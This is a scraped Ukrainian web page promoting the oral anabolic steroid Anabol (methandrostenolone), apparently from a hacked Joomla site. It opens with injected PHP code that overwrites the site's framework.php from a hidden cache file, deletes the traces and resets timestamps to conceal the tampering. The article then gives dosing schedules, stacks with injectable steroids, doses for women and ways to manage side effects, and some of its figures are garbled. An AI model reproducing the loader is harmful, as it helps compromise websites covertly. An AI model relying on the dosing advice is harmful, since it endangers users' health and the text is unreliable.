$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Анабол | Спортивне харчування - успіх у бодібілдингу та пауерліфтингу

Анабол

АнаболАнабол (  Метандронстеналон) – це стероїд (метандіенон) нового зразка, який застосовується орально для поліпшення вироблення білка організмом. Мета застосування Анабола: підвищити синтез протеїнів, що в свою чергу призводить до того, що організм починає більш швидко виробляти білок. Анабол не тільки збільшує вироблення білка організмом, але й надає позитивний вплив на організм людини в цілому, зокрема, є додатковим джерелом кальцію для кісткової тканини і надає загально зміцнюючу дію. Тому анабол рекомендують застосовувати в тих випадках, коли організму необхідний прискорений синтез білка.

Анабол – анаболічний стероїд, застосовуваний орально. Його творцем є доктор Джон Циглер, що займався розробкою цього анаболіка спільно з компанією "Ciba-Geigy". У 1956 році Анабол був виготовлений, а вже в 1960 році поступив в продаж на території США, трохи пізніше його стало можливо придбати і в інших країнах світу. Лише через декілька років Анабол завоював популярність в певних колах, ставши одним з найуживаніших з існуючих стероїдів для безлічі спортсменів. Незважаючи на успіх у травні 1982 року компанія "Ciba-Geigy" заявила про зняття Анабола з виробництва і його вилучення з продажу. Фірма пояснила свої дії тим, що Анабол став використовуватися в цілях, що не відповідають його призначенням, зокрема, для підвищення засвоєння протеїнів і поліпшення апетиту хворих, у тому числі дітей і жінок. Через три роки в травні 1985 року з продажу був вилучений і ін'єкційний Анабол, що використовується у ветеринарії. Після того, як компанія "Ciba-Geigy" втратила патентне право на виробництво і випуск чинної хімічної речовини, що входить до складу Анабола - метандростенолон - цим не забарилися скористатися інші компанії, почавши постачати спортсменам дані ліки, часом випускаючи його в продаж вже під іншою назвою . Ознайомитися з повним переліком назв можна на початку статті. Що стосується хімічного складу Анабола, то він багато в чому схожий з 17 - альфа - метилтестостероном, завдяки чому Анабол чинить на організм підвищену андрогенну і анаболічну дію. Як правило, це виявляється у прискореному накопиченні м'язової маси. По суті, Анабол це швидкодіючий "стероїд м'язової маси", що гарантує щотижневе збільшення маси тіла на 1-2 кілограма. При регулярному вживанні Анабола підвищення маси тіла пояснюється утриманням організмом води і природним приростом м'язової тканини або іншими словами гіпертрофією м'язових волокон. Одне з властивостей Анабола - це здатність частини речовин трансформуватися в естрогени, завдяки чому Анабол ароматизується. Уникнути цього ефекту можна, якщо одночасно з ним приймати такі ліки, як Нольвадекс і Провірон, які, до того ж, допомагають позбутися від ефекту накопичення води в організмі. Анабол не найкращий засіб, який можна використовувати в процесі підготовки до тих чи інших змагань, але якщо комбінувати його як було зазначено вище, то цілком допустимий прийом цих ліків за 3-4 дні до початку змагань.

Дозування цього препарату дуже розпливчасте і залежить від виду спорту і бажаного ефекту. Так, наприклад, штангісти і спортсмени, які займаються пауерліфтингом або бодібілдінгом, можуть приймати від 2 до 20 таблеток на день. Тим часом, спортсмени, які вважають, що від пари і більше десятків таблеток підуть лише на користь їх організму, явно не чули висловлювання про Анабол компанії "Ciba-Geigy", що свідчить, що Анабол, звичайно, сприяє приросту маси тіла. Але ось прямо пропорційної залежності між високим дозуванням цього препарату і швидкістю приросту м'язової маси не існує. На думку авторів книги "гормональна регуляція і психофізичний нахил у великому спорті" Р. Хекро і X. Де Маара на сьогоднішній день немає доказів того, що існує яка-небудь залежність між концентрацією препарату в крові і дозою яка приймається. Не варто розуміти ці слова як те, що однієї таблетки на день буде достатньо для досягнення необхідного ефекту, просто кожен спортсмен повинен підбирати дозу для себе індивідуально, а, не виходячи з принципу «чим більше, тим краще». Як було з'ясовано на практиці, оптимальною дозою, для більшості атлетів буде від 15 до 40мг препарату на день. Розрахунок оптимального дозування варто проводити виходячи з навантаження на ваш організм. Так, наприклад, новачкам не слід захоплюватися ним, беручи більше 20мг щодня, оскільки вже 80-10 мг цілком достатньо для досягнення відмінних результатів. Якщо ж з початку прийому препарату пройшло близько 8 тижнів, і було відзначено зниження дії ліків, то це зовсім не говорить про те, що потрібно підвищувати дозування, достатньо лише приймати препарат разом з одним із ін'єкційних стероїдів, наприклад, Дека дураболін або Прімаболон. Дозування цих препаратів біля 200 мг на тиждень, крім того, ними можна повністю замінити прийом Анабола. А ось тестостерон приймати на даному етапі не варто, краще почекати, і ефект обов'язково дасть про себе знати. Ті, хто хоче отримати швидкий результат, як правило, це досвідчені атлети, можна використовувати поєднання двох препаратів: Дека дураболін (дозування: 200-400 мг на тиждень) і Анабол (дозування: 20-30 мг на день), якщо ж і це не дає результату, то навряд чи вам допоможе який-небудь препарат, заявляє Даніель Дачейн в довіднику: "Довідник з стероїдів 2".

Як показує практика, досягти чудових результатів для більшості атлетів допомагає регулярний прийом комбінації препаратів Дека дураболін і Анабола. Ті, хто давно переступив початковий етап, і чия маса тіла перевищує 100 кг, можуть приймати 40 мг, максимум 50мг, препарату на день. Захоплюватися ж прийомом Анабола і підвищувати кількість прийнятих таблеток до двозначних чисел, позбавлене всякого сенсу, оскільки, збільшивши дозування в 2 рази, ви не досягнете вдвічі кращих результатів. Та доза препарату в 50мг, яку вживають багато спортсменів, не ґрунтується на необхідності такого дозування, а пояснюється досить просто: вони або не знають про потрібну дозу стероїду, або просто зневірилися отримати які-небудь результати і сподіваються, що збільшення дози, спричинить швидкий ефект. До речі, не варто комбінувати Анабол з Анаполоном, оскільки їх дія на організм практично ідентична, і подібний прийом є лише варіацією підвищеного дозування прийому Анабола. Якщо пріоритетом при прийомі препарату є не накопичення м'язової маси, а приріст сили, то варто поєднувати прийом Анабола з такими таблетками як Вінстрол або Оксандролон, хоча найбільш ефективним засобом будуть не таблетки, а ін'єкційний стероїд. Для того, щоб наростити м'язову масу і силу, краще всього протягом тривалого часу приміряти такі препарати, як Сустанон або Тестовірон, при цьому дозування в середньому 250 мг на тиждень. Їх можна поєднувати або ж повністю замінити на Дека-дураболін з дозуванням близько 200 мг на тиждень. Як вже говорилося, Анабол не самий кращий засіб для підготовки до змагань, оскільки його прийом супроводжується накопиченням рідини в організмі, а трансформація цієї речовини в естрогени є причиною більш повільного процесу зниження жирових відкладень. Ті, для кого вищезазначені проблеми незнайомі, і хто регулярно приймає Нольвадекс і Провірон, можуть використовувати Анабол при підготовці до змагань, але тільки в поєднанні з такими стероїдами як Мастерон, Параболаном, Оксандролон та інші.

Анабол відгуки характеристикаПриймаючи Анабол, варто пам'ятати, що його дія триває протягом 3.2-4.5 годин, тому, щоб концентрація речовини в крові була достатньою, приймати його варто не менше 2 разів на день. У процесі дослідження впливу Анабола на організм було виявлено, що тривалість дії препарату в дні тренувань менше, ніж у дні відпочинку. У зв'язку з цим в дні тренувань рекомендується приймати препарат тричі на день. Анабол краще всього приймати під час їжі, оскільки він акулірований по 17-альфа і може послужити причиною розладу шлунково-кишкового тракту. Чинна хімічна речовина Анабола - метандростенолон - виводиться з організму на третій день після закінчення прийому препарату, хоча покладатися спортсменам варто лише на негативну урінову пробу, оскільки продукти розпаду хімічної речовини метандростенолон з сечею можуть виводитися довше, незважаючи на негативний аналіз його вмісту в крові. Що стосується максимальної концентрації в крові чинної хім. речовини Анабола, то вона досягається в середньому через 1-3 години після прийому препарату. Прийом навіть 10 мг збільшує вміст тестостерону в чоловіків у 5 разів. Ефективність Анабола пояснюється тим, що при його прийомі більш ніж в 2 рази скорочується вироблення кортизону, що в свою чергу є причиною зниження розпаду в м’язових волокнах протеїну.

А от жінкам, незважаючи на всю ефективність Анабола, застосовувати його не радиться, оскільки він є причиною маскулінізації. Правда, незважаючи на це сьогодні безліч жінок, які професійно займаються пауерліфтингом і бодібілдінгом, щодня приймають близько 10-20 мг Анабола, досягаючи при цьому приголомшливих результатів. Ті спортсменки, які не побоюються маскулінізації або ж просто не чутливі до андрогенів, приймають препарат протягом 4-6 тижнів по 2-4 таблетки щодня. Можна, звичайно, підвищити дозування препарату або збільшити термін його прийому, але тоді факт наявності андрогенів в організмі стає помітним. Тому, якщо для спортсменки жіночність її фігури стоїть не на останньому місці, то не варто зловживати препаратами і приймати його більше 1-1.5 місяців в дозуванні 10мг або більше 50-100мг Дека дураболіну щодня.

Безумовно, побічні ефекти у Анабола, як і в інших подібних препаратів, є. Наприклад, через те, що Анабол алькулірований по 17-альфа, є ризик підвищення навантаження на печінку. Але при розумному дозуванні - не більше 20мг на день - вони практично ніколи не проявляються. Тривале застосування такого препарату як Анабол підвищує ризик потрапляння токсинів у печінку, але після закінчення прийому препарату секреція печінки, як правило, нормалізується. Крім того, через накопичення рідини в організмі, і, як наслідок, підвищення ваги, яке викликає Анабол, існує ризик підвищення тиску або частоти серцевого скорочення, уникнути цього можна приймаючи такий препарат для зниження тиску, яким є, наприклад, Катапрізан. Як вже говорилося, Анабол через підвищені властивості ароматизації, є причиною вироблення естрогену, що може сприяти гінекомастії у спортсменів. Уникнути цього можна, беручи разом із цим препаратом Нольвадекс і Провірон. Анабол містить у своєму складі сильний андрогенний компонент, який може трансформуватися в дігідротестерон. Через це посилюється функція сальних залоз і можливо висипання на грудях, обличчі і шиї. Також, якщо є схильність, то той же дигідротестостерон у складі Анабола може послужити причиною раннього облисіння. У ході проведених досліджень було виявлено, що щоденний прийом 10мг Анабола протягом 10 днів, сприяють зниженню рівня тестостерону на 1/3. Причиною цього є антигонадоропний ефект, властивий Анаболу, іншими словами, цей препарат сприяє зниженню вироблення через гіпофіз таких гормонів, як фолікулярностимулюючі і лютсінізуючі. Серед недоліків цього препарату можна відзначити те, що якщо припинити його прийом, то найчастіше накопичена з його допомогою м'язова маса і сила, починає знижуватися. Це пояснюється тим, що з організму починає виводитися рідина, яка накопичувалася в процесі прийому препарату. Крім того, висока щоденна доза препарату - більше 50мг на день - може послужити причиною виникнення у спортсмена необґрунтованої агресії, яка далеко не завжди йде на тренування. Тому, якщо спортсмен має легко дратівливий вибуховий характер, то варто бути обережнім з дозуванням препарату. Але, незважаючи на всі можливі побічні ефекти Анабола на сьогоднішній день він для більшості спортсменів є стероїдом, що допомагає покращити самопочуття та настрій, підвищити апетит, наростити м'язову масу, силу, а як наслідок, і підвищити самооцінку.
 
Статті СТЕРОЇДИ Анабол